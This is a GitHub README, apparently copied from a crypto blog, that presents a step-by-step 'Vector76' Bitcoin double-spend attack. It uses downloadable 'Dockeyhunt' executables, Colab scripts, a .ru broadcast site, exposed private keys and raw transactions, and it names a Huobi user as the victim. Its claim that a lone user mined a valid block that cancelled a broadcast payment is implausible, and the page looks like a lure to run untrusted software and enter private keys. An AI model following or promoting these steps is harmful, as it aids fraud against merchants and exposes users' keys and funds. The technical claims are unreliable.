Skip to content

Latest commit

 

History

History
1127 lines (373 loc) · 67.4 KB

README.md

File metadata and controls

1127 lines (373 loc) · 67.4 KB

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

With the development of cryptocurrency technologies and the increasing popularity of Bitcoin, various software such as Flash Bitcoin Software and Fake BTC Software have appeared in the market . These programs can lead to disastrous consequences on the Bitcoin ecosystem . In this article, we will look at what these softwares are, how they work and what impact they have on the Bitcoin cryptocurrency using real data , as well as how these various softwares use the Vector76 Attack mechanism , which is a type of double-spending attack , in which an attacker tries to conduct the same transaction twice. Unlike the classic double-spending attack, Vector76 exploits vulnerabilities in transaction confirmation mechanisms and time delays in the propagation of blocks across the Bitcoin network.



In a Vector76 attack, the attacker first creates two transactions: one to send funds to their Bitcoin address and one to send the same funds to the merchant’s Bitcoin address. They then try to convince the merchant to accept the unconfirmed transaction while simultaneously broadcasting the other transaction to the network. If the attacker manages to complete their transaction before the merchant receives confirmation, the funds will be sent to the attacker’s address rather than the merchant’s.

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Software

Software makes it easy for an attacker to time-slot the time between a transaction being confirmed on the local network and being propagated to the entire Bitcoin network. The attacker creates two transactions: one that is sent to the local network and one that is sent to the main network. If the attacker manages to send the first transaction before the second is confirmed, they can trick the recipient into believing that the first transaction is genuine. Let’s look at some of the most well-known software that uses time-slotting to successfully confirm a Bitcoin transaction.

Flash Bitcoin Software is a software that allows users to temporarily increase their Bitcoin wallet balance. This is done by creating transactions that appear legitimate but are not actually confirmed on the blockchain. Such transactions can be used to deceive users and services that accept Bitcoin.


Fake BTC Software , in turn, is designed to create fake Bitcoin transactions. These transactions can be used for fraud, as they create the appearance of a transfer of funds, although in reality no funds are transferred. This software can be used to deceive sellers and buyers in cryptocurrency transactions.


Dockeyhunt Vector76 Attack is designed to create two or more Raw transactions with the purpose of confirmation via Broadcast Bitcoin Transaction for a double-spend scenario with the same Bitcoin. The essence of the attack is that the attacker sends the same transaction to two different parts of the network, creating a temporary discrepancy in the Bitcoin blockchain. This software can also be used to deceive sellers and buyers in cryptocurrency transactions and operations where different tokens and various well-known cryptocurrencies are accepted Bitcoin, Etherium, etc.


CGMiner and BFGMiner these software are designed for mining and can be used to implement Selfish Mining attacks , as they allow miners to control the process of mining blocks.


Wireshark is a network analysis software and can be used to analyze network traffic and implement Sybil Attack and Eclipse Attack . Fraudsters can use modified versions of the Bitcoin Core client to perform various attacks on the consensus mechanism.


BlockSci – This software allows you to analyze the blockchain and can be used to conduct transaction analysis and Dusting Attack (DUST ATTACK) .


Impact of the attack on the Bitcoin network

Vector76 Attack was first described in 2011 and is a combination of Finney and Race attacks . The attack exploits vulnerabilities in the Bitcoin network transaction confirmation process. The basic idea is to create two conflicting transactions and run them through different nodes in the network, allowing the attacker to trick the recipient into double spending.

In a Race Attack , an attacker attempts to conduct two transactions simultaneously, one of which he attempts to reverse.

In a Finney Attack , an attacker pre-mines a block with a transaction and then attempts to conduct another transaction with the same coins.

In the Vector76 Attack , the attacker uses elements of both attacks to create a double spending attack.

The Vector76 attack could have serious consequences for the Bitcoin network. It undermines trust in the system, as users could lose funds due to double spending. In addition, the attack could cause delays in transaction confirmations and increase network congestion.

Attack stages:

  1. Create two transactions: The attacker creates two transactions with the same amount but different recipients. One transaction is sent to the network, and the other is held in an isolated part of the Bitcoin network.
  2. Sending the first transaction: The first transaction is sent to the local network, where it is quickly confirmed.
  3. Sending the second transaction: The second transaction is sent to the Bitcoin main network.
  4. First Transaction Confirmation: The recipient of the first transaction believes it is genuine and provides the product or service.
  5. Second transaction confirmation: The second transaction is confirmed on the main network and the first transaction becomes invalid.
  6. Conflict and Double Spend : As a result, a conflict occurs and one of the transactions may be included in the blockchain, resulting in a double spend.
  7. Network Merge : When an isolated part of the network merges with the main network, a conflict occurs and one of the transactions is cancelled.

Vector76 Attack Detection and Prevention Mechanisms:

To protect the Bitcoin network from Vector76 attacks, various mechanisms for detecting and preventing attacks are used, and effective algorithms and systems for detecting suspicious transactions must be implemented. Let’s consider several approaches :

  1. Block and transaction analysis: Mining software and network nodes analyze blocks and transactions for conflicts and anomalies.
  2. Increase the number of confirmations: It is recommended to wait for a larger number of confirmations (e.g. 6 or more) before considering a transaction as finally confirmed. Increasing the time to wait for a transaction to be confirmed can reduce the likelihood of a successful attack.
  3. Using Machine Learning Algorithms: Modern machine learning techniques can be used to detect suspicious patterns in transactions and blocks.
  4. Network Monitoring : Using specialized software to monitor the network for suspicious transactions and behavior.
  5. Multi-Level Confirmation: Using multiple levels of transaction confirmation can improve security.
  6. Anomaly Analysis: Implementation of anomaly analysis systems to identify suspicious transactions and blockchains.
  7. Updating Protocols : Regularly updating security protocols and implementing new security methods can improve the network’s resilience to attacks.
  8. Strengthening the consensus mechanism : Implementing additional checks and confirmations for transactions, which will make it more difficult to carry out attacks.

Distribution of an alternative block for carrying out Vector76 Attack:

  1. Creating Two Conflicting Transactions: An attacker creates two transactions that use the same inputs but have different recipients.
  2. First Transaction Propagation: The first transaction is sent to the network and included in a block that miners begin to confirm.
  3. Creating an alternative block: The attacker uses their own mining software to create an alternative block containing the second transaction.
  4. Propagation of an alternative block: At a time when the first transaction has already received several confirmations, the attacker propagates an alternative block that may be accepted by the network if it contains more confirmations.

Structure of Vector76 Attack:

  1. Setup : The attacker creates two transactions: one for the victim (T1) and one for himself (T2) .
  2. Block mining : An attacker mines a block that includes T2 but does not publish it.
  3. T1 execution : The attacker sends T1 to the network and the victim accepts it after one confirmation.
  4. Block Publishing : The attacker publishes a block with T2 , which cancels T1 .
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Practical part

Let’s look at an example of this attack using the Dockeyhunt Vector76 Attack software.

Download the software from the official website: www.dockeyhunt.com

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

We will install all the necessary packages and libraries and run the setup.exe file.

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

To carry out a successful attack, it is very important for us to create a second transaction ( for ourselves T2 ) for this, we need to prepare a Bitcoin Wallet in advance where we will send all our BTC coins for further storage in a cold wallet. Open the folder and run Cold Bitcoin Wallet.exe to generate a new Bitcoin Address

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Click Generate Address

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Our new Bitcoin Address details for further storage in a cold wallet.

Cold Bitcoin Wallet: 

             Private Key HEX: 7b774f968a0eff26bb645fa91830a17a749e685ca4fab58b98bc03fd6a48405c
             Private Key WIF: 5JkfMchWKeVh5nUmbTHPhFTpMPmWjn5a9JtrR8iBQqPCCmonapz
             Private Key WIF compressed: L1MiHzZnRJVdv7jZq51MAeqN11VUFoyBHfys7X2kxCYxSxT9GWRx 
           
Public Key: 04addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba2b7c42c09f8d7d12c6f68a4d1750ac6abbf1379802b9501d9cc1c51b6dcbc87d 
                      Public Key compressed: 03addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba

                      Public Address 1: 1KivXGdoDVPZCZLHpAe8rCztEirdrWuR4Y   
                      Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq   
                      Public Address 3: 36QRQhDUdaufqTJYfgV76CTor6Nix8Zvz3  
                      Public Address bc1 P2WPKH: bc1qpy79lkrlls0jhva93llvq6tkchrkp5zfgq5ned    
                      Public Address bc1 P2WSH: bc1q3j88twpmde2rwz5tnecdezxsxtxje0cswfjkcfcckq3mx4d3hm2stuw0ss  

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data


Now we establish a connection with the recipient, in our case the pseudo-recipient is a user of the Huobi crypto exchange

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Bitcoin Pseudo-recipient address:

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

https://bitinfocharts.com/bitcoin/address/143gLvWYUojXaWZRrxquRKpVNTkhmr415B


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Creating Raw Transaction T1 (Victim)

The pseudo-recipient (victim) is a user of the Huobi crypto exchange and expects from the sender (attacker) an amount of: 1.17506256 BTC (in Bitcoin cryptocurrency )

Sender’s Bitcoin Wallet for the amount: 1.17521256 BTC

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

https://btc1.trezor.io/address/1888dvSYUx23z2NNow let’s use the Python script: pushtx.py to send Bitcoin Transaction RawTXF79NyCaYQ8dxcWCjHDz


Let’s open a new notebook in Google Colab : https://colab.research.google.com

Clone the Broadcast-Bitcoin-Transaction repository

!git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git

cd Broadcast-Bitcoin-Transaction/

ls
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Run Python script bitcoin_info.py (to check the Bitcoin sender address)

!python3 bitcoin_info.py

1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

To create a Raw transaction T1, we need to copy from Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz UTXO ( Unspent Transaction Output ) the last TXID as an output of unspent transactions for the sender’s wallet.

https://btc1.trezor.io/tx/3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861


Let’s go back to the root directory and run the Dockeyhunt Vector76 Attack software

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Option:

When creating a transaction, we need to sign a digital signature with the ECDSA algorithm , insert the private key of the Bitcoin Wallet sender into the field: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz ( for verification, we can use bitaddress )

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Copy TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 and paste it into the field. This is necessary to ensure that transactions are fully verified for all Bitcoin network nodes, as all transaction inputs are valid (this is very important and necessary for a successful Vector76 attack to ensure that the sender’s BTC coins are not spent in advance) . UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions) .

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Copy the Bitcoin Address of the pseudo-recipient of the Huobi crypto exchange : 143gLvWYUojXaWZRrxquRKpVNTkhmr415B and paste it into the field.

Send Address: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B

Copy the total amount of Bitcoin coins and paste it into the field (for this sender this amount is: 1.17521256 BTC the amount must be specified in Satoshi in the amount of: 117521256 )

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Let’s specify our own amount in the amount of: 15000 sat/vByte this amount is a commission for the process of processing transactions by the miner. In Bitcoin, when we send a transaction, we pay a commission to the miners for including our created Raw transaction in the blockchain (this commission stimulates miners to process and confirm transactions).

Fee: 0.00015000 BTC (15000 sat/vByte)

Let’s specify the amount for sending BTC coins in our case when extracting from the total amount of 117521256 sat/vByte and the size of the commission: 15000 sat/vByte the amount to send will be in Satoshi : 117506256

Sent: 1.17506256 BTC (117506256 sat/vByte)

After we have added all the options, click Create Transaction

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data


Result:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data


Now let’s use the Python script: pushtx.py to send Bitcoin Transaction RawTX

!python3 pushtx.py

010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Result:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

A pseudo-recipient user of the  Huobi crypto exchange sees a payment on the Bitcoin TX network: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Now the attacker proceeds to the second stage, creating a T2 transaction (for himself) to take all the coins for the sent amount of 1.17506256 BTC (117506256 sat/vByte) from the Bitcoin network to the balance of his cold wallet.


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Create Raw transaction T2 (for yourself)

Previously we created a cold Bitcoin Wallet, we did this in advance specifically to create the second transaction ( for ourselves  T2 ) to prepare the Bitcoin Wallet: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq where we will send from the Bitcoin network all coins in the amount of: 1.17506256 BTC (117506256 sat/vByte) for further storage in a cold wallet).

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Copy the Bitcoin Address of the new cold wallet:

Cold Bitcoin Wallet:

Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Let’s re-launch the Dockeyhunt Vector76 Attack software.

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Let’s add a new option with new data

Option:

All the same, to create a transaction, we need to sign a digital signature with the ECDSA algorithm , insert the private key of the Bitcoin Wallet sender into the field: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz ( for verification, we can use bitaddress )

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Copy TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 and paste it into the field. This is necessary to ensure that transactions are fully verified for all Bitcoin network nodes, as all transaction inputs are valid (this is very important and necessary for a successful Vector76 attack to ensure that the sender’s BTC coins are not spent in advance) . UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions) .

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Let’s copy the new Bitcoin Address of the new cold wallet where we will transfer all BTC coins : 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq and paste it into the field.

Send Address: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Copy the total amount of Bitcoin coins and paste it into the field (for this sender this amount is: 1.17521256 BTC the amount must be specified in Satoshi in the amount of: 117521256 )

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Let’s specify our own amount in the amount of: 15000 sat/vByte this amount is a commission for the process of processing transactions by the miner. In Bitcoin, when we send a transaction, we pay a commission to the miners for including our created Raw transaction in the blockchain (this commission stimulates miners to process and confirm transactions).

Fee: 0.00015000 BTC (15000 sat/vByte)

Let’s specify the amount for sending BTC coins in our case when extracting from the total amount of 117521256 sat/vByte and the size of the commission: 15000 sat/vByte the amount to send will be in Satoshi : 117506256

Sent: 1.17506256 BTC (117506256 sat/vByte)

After we have added all the options, click Create Transaction

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Result:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data


Now let’s use the Python script: pushtx.py to send Bitcoin Transaction RawTX

!python3 pushtx.py
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Result:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000
TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

Now we have received TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc all that remains is to mine the block and publish the block to the main blockchain which includes the T2 transaction (for ourselves) .

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Mining and publishing a block to the Bitcoin network main chain

Let’s go back to the root directory, open the folder and run the Block Bitcoin Mining software

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

To add an option to an empty field, we need to get input data for certain values ​​to configure the mining block. To do this, run the Python script: block_header.py and enter the UTXO value we know, which we previously added to the Prev TXID option hash when creating the Raw transaction Prev TXID : 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions) .

!python3 block_header.py

3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Let’s copy the received data:

Enter TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Block Header:
Block: 00000000000000000003e5557c14e955f2c88465bb8c02a4d694a3657a40d79e
Block Height: 808875
Mined Time: 2023-09-22T17:29:25Z
Prev Block: 000000000000000000048e0643366b7c0129d2dd8d2cf758ca6273ed81c765d8
Merkle Root: c1fc30413e984cdd90dc1ac91a69add6c138af950e1c6388cb20759494073d2c
Nonce: 1098256692
Bits: 386198911
Version: 536903680

Let’s add RawTX for T2 transaction (for ourselves)

Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Once the block for the T2 transaction (for yourself) is mined using the Block Bitcoin Mining software, we will receive a file in JSON format


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Our mined block for confirmation in the general blockchain chain is located in the file: block_hash_mining.json

Let’s open the file: block_hash_mining.json using Notepad++


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

In line #875 we see a new block.

block_hash: 00000000000000000004401ea0694af9c89564d76bc5462577e312eea5d23fa2

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data


Let’s go back to Google Cola b and run the Python script, enter the TXID of the T2 transaction (for ourselves)

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

EVERYTHING IS CORRECT!!!

The block confirms the authenticity of transaction T2 (to itself) .


Let’s also check the link in the blockchain:

https://btc1.trezor.io/tx/d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Payment confirmed by miners


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

Transaction T1 (victim) is cancelled

Huobi crypto exchange user pseudo-recipient payment   automatically canceled on Bitcoin  TX network: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

https://btc1.trezor.io/tx/e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Transaction not found due to not being in the general block chain


Conclusion:

All these software and tools facilitate the creation of fraudulent schemes, which can lead to an increase in the number of victims and losses of BTC and ETH coins among users. This, in turn, can cause a negative attitude towards cryptocurrencies and the crypto community as a whole.

Damage to Business: Many companies and services that accept Bitcoin may suffer significant losses due to the use of fake transactions. This may lead to the refusal to accept Bitcoin as a means of payment, which will also negatively affect its adoption.

Increased complexity of regulation: The use of such software complicates the work of regulators and law enforcement agencies who are trying to combat fraud and money laundering. This may lead to stricter regulations and restrictions on the use of cryptocurrencies.

Need for improved security : Constant threats require developers and users to implement new security measures and improve existing protection mechanisms. The Bitcoin developer community can take steps to combat fraudulent transactions. This may include improving transaction confirmation algorithms and introducing new security protocols. However, such measures may require significant resources and time.


References:


This material was created for the  CRYPTO DEEP TECH portal  to ensure financial data security and cryptography on elliptic curves  secp256k1 against weak ECDSA  signatures   in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of materials.


Source

Telegram: https://t.me/cryptodeeptech

Video material: https://youtu.be/Mk_BPBCXd3I

DZEN: https://dzen.ru/video/watch/669558eb4bbd297f7d375e06

Source: https://cryptodeeptech.ru/vector76-attack


Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data